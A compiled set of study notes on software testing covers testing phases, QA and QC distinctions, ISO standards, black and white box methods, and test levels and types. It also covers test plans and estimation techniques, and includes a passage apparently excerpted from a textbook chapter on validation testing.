Different companies have difference designations for people who test the software on the basis of their experience and knowledge such as Software Tester, Software Quality Assurance Engineer, and QA Analyst etc.

It is not possible to test the software at any time during its cycle. The next two sections state when testing should be started and when to end it during the SDLC.

When to Start Testing?

An early start to testing reduces the cost, time to rework and error free software that is delivered to the client. However in Software Development Life Cycle (SDLC) testing can be started from the Requirements Gathering phase and lasts till the deployment of the software. However it also depends on the development model that is being used. For example in Water fall model formal testing is conducted in the Testing phase, but in incremental model, testing is performed at the end of every increment/iteration and at the end the whole application is tested.

Testing is done in different forms at every phase of SDLC like during Requirement gathering phase, the analysis and verifications of requirements are also considered testing. Reviewing the design in the design phase with intent to improve the design is also considered as testing. Testing performed by a developer on completion of the code is also categorized as Unit type of testing.

When to Stop Testing?

Unlike when to start testing it is difficult to determine when to stop testing, as testing is a never ending process and no one can say that any software is 100% tested. Following are the aspects which should be considered to stop the testing:

• Testing Deadlines. • Completion of test case execution. • Completion of Functional and code coverage to a certain point. • Bug rate falls below a certain level and no high priority bugs are identified. • Management decision.

Verification & Validation

These two terms are very confusing for people, who use them interchangeably. Let's discuss about them briefly.

Testing, Quality Assurance and Quality Control

Most people are confused with the concepts and difference between Quality Assurance, Quality Control and Testing. Although they are interrelated and at some level they can be considered as the same activities, but there is indeed a difference between them. Mentioned below are the definitions and differences between them:

Audit and Inspection

Audit:

A systematic process to determine how the actual testing process is conducted within an organization or a team. Generally, it is an independent examination of processes which are involved during the testing of software. As per IEEE, it is a review of documented processes whether organizations implements and follows the processes or not. Types of Audit include the Legal Compliance Audit, Internal Audit, and System Audit.

Inspection:

A formal technique which involves the formal or informal technical reviews of any artifact by identifying any error or gap. Inspection includes the formal as well as informal technical reviews. As per IEEE94, Inspection is a formal evaluation technique in which software requirements, design, or code are examined in detail by a person or group other than the author to detect faults, violations of development standards, and other problems.

Formal Inspection meetings may have following process: Planning, Overview Preparation, Inspection Meeting, Rework, and Follow-up.

Testing and Debugging

Testing:

It involves the identification of bug/error/defect in the software without correcting it. Normally professionals with a Quality Assurance background are involved in the identification of bugs. Testing is performed in the testing phase.

Debugging:

It involves identifying, isolating and fixing the problems/bug. Developers who code the software conduct debugging upon encountering an error in the code. Debugging is the part of White box or Unit Testing. Debugging can be performed in the development phase while conducting Unit Testing or in phases while fixing the reported bugs.

Software Testing ISO Standards

Many organizations around the globe are developing and implementing different Standards to improve the quality needs of their Software. The next section briefly describes some of the widely used standards related to Quality Assurance and Testing. Here is a definition of some of them:

ISO/IEC 9126

This standard deals with the following aspects to determine the quality of a software application:

• Quality model • External metrics • Internal metrics • Quality in use metrics

This standard presents some set of quality attributes for any Software such as:

• Functionality • Reliability • Usability • Efficiency • Maintainability • Portability

The above mentioned quality attributes are further divided into sub-factors which you can study when you will go in detail of the standard.

ISO/IEC 9241-11

Part 11 of this standard deals with the extent to which a product can be used by specified users to achieve specified goals with Effectiveness, Efficiency and Satisfaction in a specified context of use.

This standard proposed a framework which describes the usability components and relationship between them. In this standard the usability is considered in terms of user performance and satisfaction. According to ISO 9241-11 usability depends on context of use and the level of usability will change as the context changes.

ISO/IEC 25000:2005

ISO/IEC 25000:2005 is commonly known as the standard which gives the guidelines for Software product Quality Requirements and Evaluation (SQuaRE). This standard helps in organizing and enhancing the process related to Software quality requirements and their evaluations. In reality, ISO-25000 replaces the two old ISO standards i.e. ISO-9126 and ISO-14598.

SQuaRE is divided into sub parts such as:

• ISO 2500n - Quality Management Division. • ISO 2501n - Quality Model Division. • ISO 2502n - Quality Measurement Division.

• ISO 2503n - Quality Requirements Division. • ISO 2504n - Quality Evaluation Division.

The main contents of SQuaRE are:

• Terms and definitions. • Reference Models. • General guide. • Individual division guides. • Standard related to Requirement Engineering (i.e. specification, planning,

measurement and evaluation process)

ISO/IEC 12119

This standard deals with Software packages delivered to the client. It does not focus or deal with the client's (the person/organization whom Software is delivered) production process. The main contents are related to the following items:

• Set of Requirements for Software packages. • Instructions for testing the delivered Software package against the requirements.

Software Testing Types

This section describes the different types of testing which may be used to test a Software during SDLC.

Manual testing

This type includes the testing of the Software manually i.e. without using any automated tool or any script. In this type the tester takes over the role of an end user and test the Software to identify any un-expected behavior or bug. There are different stages for manual testing like unit testing, Integration testing, System testing and User Acceptance testing.

Testers use test plan, test cases or test scenarios to test the Software to ensure the completeness of testing. Manual testing also includes exploratory testing as testers explore the software to identify errors in it.

Automation testing

Automation testing which is also known as Test Automation, is when the tester writes scripts and uses another software to test the software. This process involves

automation of a manual process. Automation Testing is used to re-run the test scenarios that were performed manually, quickly and repeatedly.

Apart from regression testing, Automation testing is also used to test the application from load, performance and stress point of view. It increases the test coverage; improve accuracy, saves time and money in comparison to manual testing.

What to automate?

It is not possible to automate everything in the Software; however the areas at which user can make transactions such as login form or registration forms etc, any area where large amount of users. can access the Software simultaneously should be automated.

Furthermore all GUI items, connections with databases, field validations etc can be efficiently tested by automating the manual process.

When to automate?

Test Automation should be uses by considering the following for the Software:

• Large and critical projects. • Projects that require testing the same areas frequently. • Requirements not changing frequently. • Accessing the application for load and performance with many virtual users. • Stable Software with respect to manual testing. • Availability of time.

How to automate?

Automation is done by using a supportive computer language like vb scripting and an automated software application. There are a lot of tools available which can be use to

write automation scripts. Before mentioning the tools lets identify the process which can be used to automate the testing:

• Identifying areas within a software for automation. • Selection of appropriate tool for Test automation. • Writing Test scripts. • Development of Test suits. • Execution of scripts. • Create result reports. • Identify any potential bug or performance issue.

Software testing tools

Following are the tools which can be use for Automation testing:

• HP Quick Test Professional • Selenium • IBM Rational Functional Tester • SilkTest • TestComplete • Testing Anywhere • WinRunner • LaodRunner • Visual Studio Test Professional • WATIR

Software Testing Methods

There are different methods which can be use for Software testing. This chapter briefly describes those methods.

Black Box Testing

The technique of testing without having any knowledge of the interior workings of the application is Black Box testing. The tester is oblivious to the system architecture and does not have access to the source code. Typically, when performing a black box test, a tester will interact with the system's user interface by providing inputs and examining outputs without knowing how and where the inputs are worked upon.

White Box Testing

White box testing is the detailed investigation of internal logic and structure of the code. White box testing is also called glass testing or open box testing. In order to perform white box testing on an application, the tester needs to possess knowledge of the internal working of the code.

The tester needs to have a look inside the source code and find out which unit/chunk of the code is behaving inappropriately.

Grey Box Testing

Grey Box testing is a technique to test the application with limited knowledge of the internal workings of an application. In software testing, the term the more you know the better carries a lot of weight when testing an application.

Mastering the domain of a system always gives the tester an edge over someone with limited domain knowledge. Unlike black box testing, where the tester only tests the

application's user interface, in grey box testing, the tester has access to design documents and the database. Having this knowledge, the tester is able to better prepare test data and test scenarios when making the test plan.

Levels of Software Testing

There are different levels during the process of Testing. In this chapter a brief description is provided about these levels.

Levels of testing include the different methodologies that can be used while conducting Software Testing. Following are the main levels of Software Testing:

• Functional Testing. • Non-Functional Testing.

Functional Testing

This is a type of black box testing that is based on the specifications of the software that is to be tested. The application is tested by providing input and then the results are examined that need to conform to the functionality it was intended for. Functional Testing of the software is conducted on a complete, integrated system to evaluate the system's compliance with its specified requirements.

There are five steps that are involved when testing an application for functionality.

An effective testing practice will see the above steps applied to the testing policies of every organization and hence it will make sure that the organization maintains the strictest of standards when it comes to software quality.

Unit Testing

This type of testing is performed by the developers before the setup is handed over to the testing team to formally execute the test cases. Unit testing is performed by the respective developers on the individual units of source code assigned areas. The developers use test data that is separate from the test data of the quality assurance team.

The goal of unit testing is to isolate each part of the program and show that individual parts are correct in terms of requirements and functionality.

Limitations of Unit Testing

Testing cannot catch each and every bug in an application. It is impossible to evaluate every execution path in every software application. The same is the case with unit testing.

There is a limit to the number of scenarios and test data that the developer can use to verify the source code. So after he has exhausted all options there is no choice but to stop unit testing and merge the code segment with other units.

Integration Testing

The testing of combined parts of an application to determine if they function correctly together is Integration testing. There are two methods of doing Integration Testing Bottom-up Integration testing and Top Down Integration testing.

In a comprehensive software development environment, bottom-up testing is usually done first, followed by top-down testing. The process concludes with multiple tests of the complete application, preferably in scenarios designed to mimic those it will encounter in customers' computers, systems and network.

System Testing

This is the next level in the testing and tests the system as a whole. Once all the components are integrated, the application as a whole is tested rigorously to see that it meets Quality Standards. This type of testing is performed by a specialized testing team.

System testing is so important because of the following reasons:

• System Testing is the first step in the Software Development Life Cycle, where the application is tested as a whole.

• The application is tested thoroughly to verify that it meets the functional and technical specifications.

• The application is tested in an environment which is very close to the production environment where the application will be deployed.

• System Testing enables us to test, verify and validate both the business requirements as well as the Applications Architecture.

Regression Testing

Whenever a change in a software application is made it is quite possible that other areas within the application have been affected by this change. To verify that a fixed bug hasn't resulted in another functionality or business rule violation is Regression testing. The intent of Regression testing is to ensure that a change, such as a bug fix did not result in another fault being uncovered in the application.

Regression testing is so important because of the following reasons:

• Minimize the gaps in testing when an application with changes made has to be tested.

• Testing the new changes to verify that the change made did not affect any other area of the application.

• Mitigates Risks when regression testing is performed on the application. • Test coverage is increased without compromising timelines. • Increase speed to market the product.

Acceptance Testing

This is arguably the most importance type of testing as it is conducted by the Quality Assurance Team who will gauge whether the application meets the intended specifications and satisfies the client.s requirements. The QA team will have a set of pre written scenarios and Test Cases that will be used to test the application.

More ideas will be shared about the application and more tests can be performed on it to gauge its accuracy and the reasons why the project was initiated. Acceptance tests are not only intended to point out simple spelling mistakes, cosmetic errors or Interface gaps, but also to point out any bugs in the application that will result in system crashers or major errors in the application.

By performing acceptance tests on an application the testing team will deduce how the application will perform in production. There are also legal and contractual requirements for acceptance of the system.

Alpha Testing

This test is the first stage of testing and will be performed amongst the teams (developer and QA teams). Unit testing, integration testing and system testing when combined are known as alpha testing. During this phase, the following will be tested in the application:

• Spelling Mistakes • Broken Links • Cloudy Directions • The Application will be tested on machines with the lowest specification to test

loading times and any latency problems.

Beta Testing

This test is performed after Alpha testing has been successfully performed. In beta testing a sample of the intended audience tests the application. Beta testing is also known as pre-release testing. Beta test versions of software are ideally distributed to a wide audience on the Web, partly to give the program a "real-world" test and partly to provide a preview of the next release. In this phase the audience will be testing the following:

• Users will install, run the application and send their feedback to the project team. • Typographical errors, confusing application flow, and even crashes. • Getting the feedback, the project team can fix the problems before releasing the

software to the actual users. • The more issues you fix that solve real user problems, the higher the quality of

your application will be. • Having a higher-quality application when you release to the general public will

increase customer satisfaction.

Non-Functional Testing

This section is based upon the testing of the application from its non-functional attributes. Non-functional testing of Software involves testing the Software from the requirements which are non functional in nature related but important a well such as performance, security, user interface etc.

Some of the important and commonly used non-functional testing types are mentioned as follows:

Performance Testing

It is mostly used to identify any bottlenecks or performance issues rather than finding the bugs in software. There are different causes which contribute in lowering the performance of software:

• Network delay. • Client side processing. • Database transaction processing. • Load balancing between servers. • Data rendering.

Performance testing is considered as one of the important and mandatory testing type in terms of following aspects:

• Speed (i.e. Response Time, data rendering and accessing) • Capacity • Stability • Scalability

It can be either qualitative or quantitative testing activity and can be divided into different sub types such as Load testing and Stress testing.

Load Testing

A process of testing the behavior of the Software by applying maximum load in terms of Software accessing and manipulating large input data. It can be done at both normal and peak load conditions. This type of testing identifies the maximum capacity of Software and its behavior at peak time.

Most of the time, Load testing is performed with the help of automated tools such as Load Runner, AppLoader, IBM Rational Performance Tester, Apache JMeter, Silk Performer, Visual Studio Load Test etc.

Virtual users (VUsers) are defined in the automated testing tool and the script is executed to verify the Load testing for the Software. The quantity of users can be increased or decreased concurrently or incrementally based upon the requirements.

Stress Testing

This testing type includes the testing of Software behavior under abnormal conditions. Taking away the resources, applying load beyond the actual load limit is Stress testing.

The main intent is to test the Software by applying the load to the system and taking over the resources used by the Software to identify the breaking point. This testing can be performed by testing different scenarios such as:

• Shutdown or restart of Network ports randomly. • Turning the database on or off. • Running different processes that consume resources such as CPU, Memory,

server etc.

Usability Testing

This section includes different concepts and definitions of Usability testing from Software point of view. It is a black box technique and is used to identify any error(s) and improvements in the Software by observing the users through their usage and operation.

According to Nielsen, Usability can be defined in terms of five factors i.e. Efficiency of use, Learn-ability, Memor-ability, Errors/safety, satisfaction. According to him the usability of the product will be good and the system is usable if it possesses the above factors.

Nigel Bevan and Macleod considered that Usability is the quality requirement which can be measured as the outcome of interactions with a computer system. This requirement can be fulfilled and the end user will be satisfied if the intended goals are achieved effectively with the use of proper resources.

Molich in 2000 stated that user friendly system should fulfill the following five goals i.e. Easy to Learn, Easy to Remember, Efficient to Use, Satisfactory to Use and Easy to Understand.

In addition to different definitions of usability, there are some standards and quality models and methods which define the usability in the form of attributes and sub attributes such as ISO-9126, ISO-9241-11, ISO-13407 and IEEE std.610.12 etc.

UI vs Usability Testing

UI testing involves the testing of Graphical User Interface of the Software. This testing ensures that the GUI should be according to requirements in terms of color, alignment, size and other properties.

On the other hand Usability testing ensures that a good and user friendly GUI is designed and is easy to use for the end user. UI testing can be considered as a sub part of Usability testing.

Security Testing

Security testing involves the testing of Software in order to identify any flaws ad gaps from security and vulnerability point of view. Following are the main aspects which Security testing should ensure:

• Confidentiality. • Integrity. • Authentication. • Availability. • Authorization. • Non-repudiation. • Software is secure against known and unknown vulnerabilities. • Software data is secure. • Software is according to all security regulations. • Input checking and validation. • SQL insertion attacks. • Injection flaws.

• Session management issues. • Cross-site scripting attacks. • Buffer overflows vulnerabilities. • Directory traversal attacks.

Portability Testing

Portability testing includes the testing of Software with intend that it should be re-useable and can be moved from another Software as well. Following are the strategies that can be used for Portability testing.

• Transferred installed Software from one computer to another. • Building executable (.exe) to run the Software on different platforms.

Portability testing can be considered as one of the sub parts of System testing, as this testing type includes the overall testing of Software with respect to its usage over different environments. Computer Hardware, Operating Systems and Browsers are the major focus of Portability testing. Following are some pre-conditions for Portability testing:

• Software should be designed and coded, keeping in mind Portability Requirements.

• Unit testing has been performed on the associated components. • Integration testing has been performed. • Test environment has been established.

Software Testing Documentation

Testing documentation involves the documentation of artifacts which should be developed before or during the testing of Software.

Documentation for Software testing helps in estimating the testing effort required, test coverage, requirement tracking/tracing etc. This section includes the description of some commonly used documented artifacts related to Software testing such as:

• Test Plan • Test Scenario • Test Case • Traceability Matrix

Test Plan

A test plan outlines the strategy that will be used to test an application, the resources that will be used, the test environment in which testing will be performed, the limitations

of the testing and the schedule of testing activities. Typically the Quality Assurance Team Lead will be responsible for writing a Test Plan.

A test plan will include the following.

• Introduction to the Test Plan document • Assumptions when testing the application • List of test cases included in Testing the application • List of features to be tested • What sort of Approach to use when testing the software • List of Deliverables that need to be tested • The resources allocated for testing the application • Any Risks involved during the testing process • A Schedule of tasks and milestones as testing is started

Test Scenario

A one line statement that tells what area in the application will be tested. Test Scenarios are used to ensure that all process flows are tested from end to end. A particular area of an application can have as little as one test scenario to a few hundred scenarios depending on the magnitude and complexity of the application.

The term test scenario and test cases are used interchangeably however the main difference being that test scenarios has several steps however test cases have a single step. When viewed from this perspective test scenarios are test cases, but they include several test cases and the sequence that they should be executed. Apart from this, each test is dependent on the output from the previous test.

Test Case

Test cases involve the set of steps, conditions and inputs which can be used while performing the testing tasks. The main intent of this activity is to ensure whether the Software Passes or Fails in terms of its functionality and other aspects. There are many types of test cases like: functional, negative, error, logical test cases, physical test cases, UI test cases etc.

Furthermore test cases are written to keep track of testing coverage of Software. Generally, there is no formal template which is used during the test case writing. However, following are the main components which are always available and included in every test case:

• Test case ID. • Product Module. • Product version. • Revision history. • Purpose • Assumptions • Pre-Conditions. • Steps. • Expected Outcome. • Actual Outcome. • Post Conditions.

Many Test cases can be derived from a single test scenario. In addition to this, some time it happened that multiple test cases are written for single Software which is collectively known as test suites.

Traceability Matrix

Traceability Matrix (also known as Requirement Traceability Matrix - RTM) is a table which is used to trace the requirements during the Software development life Cycle. It can be used for forward tracing (i.e. from Requirements to Design or Coding) or backward (i.e. from Coding to Requirements). There are many user defined templates for RTM.

Each requirement in the RTM document is linked with its associated test case, so that testing can be done as per the mentioned requirements. Furthermore, Bug ID is also include and linked with its associated requirements and test case. The main goals for this matrix are:

• Make sure Software is developed as per the mentioned requirements. • Helps in finding the root cause of any bug. • Helps in tracing the developed documents during different phases of SDLC.

Software Testing Estimation Techniques

Estimating effort for test is one of the major and important tasks in SDLC. Correct estimation helps in testing the Software with maximum coverage. This section describes some of the techniques which can be useful during the estimating of effort for testing.

Functional Point Analysis

This method is based on the analysis of functional user requirements of the Software with following categories:

• Outputs • Inquiries • Inputs • Internal files • External files

Test Point Analysis

This estimation process is used for function point analysis for Black box or Acceptance testing. It is use the main elements of this method are: Size, Productivity, Strategy, Interfacing, Complexity and Uniformity etc.

Mark-II method

It is estimation method used for analysis and measuring the estimation based on end user functional view. The procedure for Mark-II method is:

• Determine the View Point • Purpose and Type of Count • Define the Boundary of Count • Identify the Logical transactions • Identify and Categorize Data Entity Types • Count the Input Data Element Types • Count the Functional Size

Miscellaneous

You can use other popular estimation techniques like:

• Delphi Technique • Analogy Based Estimation • Test Case Enumeration Based Estimation • Task (Activity) based Estimation • IFPUG method

Validation

Software Testing - Validation Testing

The process of evaluating software during the development process or at the end of the development process to determine whether it satisfies specified business requirements.

Validation Testing ensures that the product actually meets the client's needs. It can also be defined as to demonstrate that the product fulfills its intended use when deployed on appropriate environment.

It answers to the question, Are we building the right product?

Validation Testing - Workflow:

Validation testing can be best demonstrated using V-Model. The Software/product under test is evaluated during this type of testing.

Activities:

• Unit Testing • Integration Testing • System Testing • User Acceptance Testing

Unit Testing

What is Unit Testing?

Unit testing, a testing technique using which individual modules are tested to determine if there are any issues by the developer himself. It is concerned with functional correctness of the standalone modules.

The main aim is to isolate each unit of the system to identify, analyze and fix the defects.

Unit Testing - Advantages:

• Reduces Defects in the Newly developed features or reduces bugs when changing the existing functionality.

• Reduces Cost of Testing as defects are captured in very early phase. • Improves design and allows better refactoring of code. • Unit Tests, when integrated with build gives the quality of the build as well.

Unit Testing Lifecycle:

Unit Testing Techniques:

• Black Box Testing - Using which the user interface, input and output are tested. • White Box Testing - used to test each one of those functions behaviour is

tested. • Gray Box Testing - Used to execute tests, risks and assessment methods.

Integration Testing

What is Integration Testing?

Upon completion of unit testing, the units or modules are to be integrated which gives raise to integration testing. The purpose of integration testing is to verify the functional, performance, and reliability between the modules that are integrated.

Integration Strategies:

• Big-Bang Integration • Top Down Integration • Bottom Up Integration • Hybrid Integration

What is Top-Down Integration Testing ?

Top-down integration testing is an integration testing technique used in order to simulate the behavior of the lower-level modules that are not yet integrated. Stubs are the modules that act as temporary replacement for a called module and give the same output as that of the actual product.

The replacement for the 'called' modules is known as 'Stubs' and is also used when the software needs to interact with an external system.

Stub - Flow Diagram:

What is Hybrid Integration Testing?

We know that Integration Testing is a phase in software testing in which standalone modules are combined and tested as a single entity. During that phase, the interface and the communication between each one of those modules are tested. There are two popular approaches for Integration testing which is Top down Integration Testing and Bottom up Integration Testing.

In Hybrid Integration Testing, we exploit the advantages of Top-down and Bottom-up approaches. As the name suggests, we make use of both the Integration techniques.

Hybrid Integration Testing - Features

• It is viewed as three layers; The Main Target Layer, a layer above the target layer and a layer below the target layer.

• Testing is mainly focused for the middle level target layer and is selected on the basis of system characteristics and the structure of the code.

• Hybrid Integration testing can be adopted if the customer wants to work on a working version of the application as soon as possible aimed at producing a basic working system in the earlier stages of the development cycle.

What is Big-Bang Testing?

Big Bang Integration Testing is an integration testing strategy wherein all units are linked at once, resulting in a complete system. When this type of testing strategy is

adopted, it is difficult to isolate any errors found, because attention is not paid to verifying the interfaces across individual units.

Big Bang Integration - Workflow Diagram

Big Bang Testing is represented by the following workflow diagram:

Disadvantages of Big-Bang Testing

• Defects present at the interfaces of components are identified at very late stage as all components are integrated in one shot.

• It is very difficult to isolate the defects found. • There is high probability of missing some critical defects, which might pop up in

the production environment. • It is very difficult to cover all the cases for integration testing without missing even

a single scenario.

What is Bottom Up Testing?

Each component at lower hierarchy is tested individually and then the components that rely upon these components are tested.

Bottom Up Integration - Flow Diagram

System Testing

What is System Testing?

System Testing (ST) is a black box testing technique performed to evaluate the complete system the system's compliance against specified requirements. In System testing, the functionalities of the system are tested from an end-to-end perspective.

System Testing is usually carried out by a team that is independent of the development team in order to measure the quality of the system unbiased. It includes both functional and Non-Functional testing.

Types of System Tests:

User Acceptance Testing

What is User Acceptance Testing?

User acceptance testing, a testing methodology where the clients/end users involved in testing the product to validate the product against their requirements. It is performed at client location at developer's site.

For industry such as medicine or aviation industry, contract and regulatory compliance testing and operational acceptance testing is also carried out as part of user acceptance testing.

UAT is context dependent and the UAT plans are prepared based on the requirements and NOT mandatory to execute all kinds of user acceptance tests and even coordinated and contributed by testing team.

User Acceptance Testing - In SDLC

The following diagram explains the fitment of user acceptance testing in the software development life cycle:

The acceptance test cases are executed against the test data or using an acceptance test script and then the results are compared with the expected ones.

Acceptance Criteria

Acceptance criteria are defined on the basis of the following attributes:

• Functional Correctness and Completeness • Data Integrity • Data Conversion • Usability • Performance • Timeliness • Confidentiality and Availability • Installability and Upgradability • Scalability • Documentation

Acceptance Test Plan - Attributes

The acceptance test activities are carried out in phases. Firstly the basic tests are executed and if the test results are satisfactory then the execution of more complex scenarios are carried out.

The Acceptance test plan has the following attributes

• Introduction • Acceptance Test Category

• operation Environment• Test case ID• Test Title• Test Objective• Test Procedure• Test Schedule• Resources

The acceptance test activities are designed to reach at one of the conclusions :

1. Accept the system as delivered2. Accept the system after the requested modifications have been made3. Do not accept the system

Acceptance Test Report - Attributes

The Acceptance test Report has the following attributes:

• Report Identifier• Summary of Results• Variations• Recommendations• Summary of To-DO List• Approval Decision

Validation testing begins at the culmination of integration testing, when individual components have been exercised, the software is completely assembled as a package, and interfacing errors have been uncovered and corrected. At the validation or system level, the distinction between conventional software, object-oriented

software, and WebApps disappears. Testing focuses on user-visible actions and

user-recognizable output from the system.

Validation can be defined in many ways, but a simple (albeit harsh) definition is

that validation succeeds when software functions in a manner that can be reason-

ably expected by the customer. At this point a battle-hardened software developer

might protest: “Who or what is the arbiter of reasonable expectations?” If a Software

Requirements Specification has been developed, it describes all user-visible attributes

of the software and contains a Validation Criteria section that forms the basis for a

validation-testing approach.

17.6.1 Validation-Test Criteria

Software validation is achieved through a series of tests that demonstrate conform-

ity with requirements. A test plan outlines the classes of tests to be conducted, and

a test procedure defines specific test cases that are designed to ensure that all func-

tional requirements are satisfied, all behavioral characteristics are achieved, all con-

tent is accurate and properly presented, all performance requirements are attained,

documentation is correct, and usability and other requirements are met (e.g., trans-

portability, compatibility, error recovery, maintainability).

After each validation test case has been conducted, one of two possible condi-

tions exists: (1) The function or performance characteristic conforms to specification

and is accepted or (2) a deviation from specification is uncovered and a deficiency

list is created. Deviations or errors discovered at this stage in a project can rarely be

corrected prior to scheduled delivery. It is often necessary to negotiate with the cus-

tomer to establish a method for resolving deficiencies.

17.6.2 Configuration Review

An important element of the validation process is a configuration review. The intent

of the review is to ensure that all elements of the software configuration have been

properly developed, are cataloged, and have the necessary detail to bolster the sup-

port activities. The configuration review, sometimes called an audit, is discussed in

more detail in Chapter 22.

17.6.3 Alpha and Beta Testing

It is virtually impossible for a software developer to foresee how the customer will

really use a program. Instructions for use may be misinterpreted; strange combina-

tions of data may be regularly used; output that seemed clear to the tester may be

unintelligible to a user in the field.

When custom software is built for one customer, a series of acceptance tests are

conducted to enable the customer to validate all requirements. Conducted by the end

user rather than software engineers, an acceptance test can range from an informal

“test drive” to a planned and systematically executed series of tests. In fact, accept-

ance testing can be conducted over a period of weeks or months, thereby uncover-

ing cumulative errors that might degrade the system over time.


Like all other testingsteps, validation triesto uncover errors, butthe focus is at therequirements level—on things that will beimmediately apparentto the end user.

uote:

“Given enougheyeballs, all bugsare shallow (e.g.,given a largeenough beta-testerand co-developerbase, almost everyproblem will becharacterizedquickly and thefix obvious tosomeone).”

E. Raymond

pre75977_ch17.qxd 11/27/08 6:09 PM Page 468

If software is developed as a product to be used by many customers, it is imprac-

tical to perform formal acceptance tests with each one. Most software product

builders use a process called alpha and beta testing to uncover errors that only the

end user seems able to find.

The alpha test is conducted at the developer’s site by a representative group of end

users. The software is used in a natural setting with the developer “looking over the

shoulder” of the users and recording errors and usage problems. Alpha tests are con-

ducted in a controlled environment.

The beta test is conducted at one or more end-user sites. Unlike alpha testing, the

developer generally is not present. Therefore, the beta test is a “live” application of

the software in an environment that cannot be controlled by the developer. The cus-

tomer records all problems (real or imagined) that are encountered during beta test-

ing and reports these to the developer at regular intervals. As a result of problems

reported during beta tests, you make modifications and then prepare for release of

the software product to the entire customer base.

A variation on beta testing, called customer acceptance testing, is sometimes per-

formed when custom software is delivered to a customer under contract. The cus-

tomer performs a series of specific tests in an attempt to uncover errors before

accepting the software from the developer. In some cases (e.g., a major corporate or

governmental system) acceptance testing can be very formal and encompass many

days or even weeks of testing.

CHAPTER 17 SOFTWARE TESTING STRATEGIES 469

What is thedifference

between an alphatest and a betatest?

?

pre75977_ch17.qxd 11/27/08 6:09 PM Page 469

Test plan

What is a Test Plan?

Test planning, the most important activity to ensure that there is initially a list of tasks and milestones in a baseline plan to track the progress of the project. It also defines the size of the test effort.

It is the main document often called as master test plan or a project test plan and usually developed during the early phase of the project.

In software testing, a test plan gives detailed testing information regarding an upcoming testing effort, including

• Scope of testing • Schedule • Test Deliverables • Release Criteria • Risks and Contingencies

A test plan is a document describing the approach to be taken for intended testing activities and serves as a service level agreement between the quality assurance testing function and other interested parties, such as development. A test plan should be developed early in the development cycle and help improve the interactions of the analysis, design, and coding activities. A test plan defines the test objectives, scope, strategy and approach, test procedures, test environment, test completion criteria, test cases, items to be tested, the tests to be performed, the test schedules, personnel requirements, reporting procedures, assumptions, risks, and contingency planning.

Test Planning Activities:

• To determine the scope and the risks that need to be tested and that are NOT to be tested.

• Documenting Test Strategy. • Making sure that the testing activities have been included. • Deciding Entry and Exit criteria. • Evaluating the test estimate. • Planning when and how to test and deciding how the test results will be

evaluated, and defining test exit criterion. • The Test artifacts delivered as part of test execution. • Defining the management information, including the metrics required and defect

resolution and risk issues. • Ensuring that the test documentation generates repeatable test assets.

A test plan is a document detailing a systematic approach to testing a system such as a machine or software. The plan typically contains a detailed understanding of the eventual workflow.

A test plan documents the strategy that will be used to verify and ensure that a product or system meets its design specifications and other requirements. A test plan is usually prepared by or with significant input from test engineers.

Depending on the product and the responsibility of the organization to which the test plan applies, a test plan may include a strategy for one or more of the following:

• Design Verification or Compliance test - to be performed during the development or approval stages of the product, typically on a small sample of units.

http://en.wikipedia.org/wiki/Machine


http://en.wikipedia.org/wiki/Workflow

http://en.wikipedia.org/wiki/Test_engineer

• Manufacturing or Production test - to be performed during preparation or assembly of the product in an ongoing manner for purposes of performance verification and quality control.

• Acceptance or Commissioning test - to be performed at the time of delivery or installation of the product.

• Service and Repair test - to be performed as required over the service life of the product.

• Regression test - to be performed on an existing operational product, to verify that existing functionality didn't get broken when other aspects of the environment are changed (e.g., upgrading the platform on which an existing application runs).

A complex system may have a high level test plan to address the overall requirements and supporting test plans to address the design details of subsystems and components.

Test plan document formats can be as varied as the products and organizations to which they apply. There are three major elements that should be described in the test plan: Test Coverage, Test Methods, and Test Responsibilities. These are also used in a formal test strategy.

1. Test coverage

Test coverage in the test plan states what requirements will be verified during what stages of the product life. Test Coverage is derived from design specifications and other requirements, such as safety standards or regulatory codes, where each requirement or specification of the design ideally will have one or more corresponding means of verification. Test coverage for different product life stages may overlap, but will not necessarily be exactly the same for all stages. For example, some requirements may be verified during Design Verification test, but not repeated during Acceptance test. Test coverage also feeds back into the design process, since the product may have to be designed to allow test access

2. Test methods

Test methods in the test plan state how test coverage will be implemented. Test methods may be determined by standards, regulatory agencies, or contractual agreement, or may have to be created new. Test methods also specify test equipment to be used in the performance of the tests and establish pass/fail criteria. Test methods used to verify hardware design requirements can range from very simple steps, such as visual inspection, to elaborate test procedures that are documented separately.

3. Test responsibilities

Test responsibilities include what organizations will perform the test methods and at each stage of the product life. This allows test organizations to plan, acquire or develop test equipment and other resources necessary to implement the test methods for which

http://en.wikipedia.org/wiki/Test_strategy

they are responsible. Test responsibilities also includes, what data will be collected, and how that data will be stored and reported (often referred to as "deliverables"). One outcome of a successful test plan should be a record or report of the verification of all design specifications and requirements as agreed upon by all parties.

A test plan is a document describing the scope, approach, objectives, resources, and schedule of a software testing effort. It identifies the items to be tested, items not be tested, who will do the testing, the test approach followed, what will be the pass/fail criteria, training needs for team, the testing schedule etc.

IEEE 829 test plan structure

IEEE 829-2008, also known as the 829 Standard for Software Test Documentation, is an IEEE standard that specifies the form of a set of documents for use in defined stages of software testing, each stage potentially producing its own separate type of document.

1. Test plan identifier 2. Introduction 3. Test items 4. Features to be tested 5. Features not to be tested 6. Approach 7. Item pass/fail criteria 8. Suspension criteria and resumption requirements 9. Test deliverables 10. Testing tasks 11. Environmental needs 12. Responsibilities 13. Staffing and training needs 14. Schedule 15. Risks and contingencies 16. Approvals

The structure of a test plan

Test plans obviously vary, depending on the project and the organization involved in the testing. Sections that would typically be included in a large system, are:

The testing process

A description of the major phases of the system testing process. This may be broken down into the testing of individual sub-systems, the testing of external system interfaces, etc.

Requirements traceability Users are most interested in the system meeting its requirements and testing should be planned so that all requirements are individually tested.

Tested items The products of the software process that are to be tested should be specified.

Testing schedule An overall testing schedule and resource allocation. This schedule should be linked to the more general project development schedule.

Test recording procedures It is not enough simply to run tests; the results of the tests must be systematically recorded. It must be possible to audit the testing process to check that it has been carried out correctly.

Hardware and software requirements This section should set out the software tools required and estimated hardware utilization.

Constraints Constraints affecting the testing process such as staff shortages should be anticipated in this section.

System tests This section, which may be completely separate from the test plan, defines the test cases that should be applied to the system. These tests are derived from the system requirements specification.

TEST PLAN TYPES

One can have the following types of test plans:

• Master Test Plan: A single high-level test plan for a project/product that unifies all other test plans.

• Testing Level Specific Test Plans: Plans for each level of testing. o Unit Test Plan o Integration Test Plan o System Test Plan o Acceptance Test Plan

• Testing Type Specific Test Plans: Plans for major types of testing like Performance Test Plan and Security Test Plan.

Test Strategy and Test Logistics

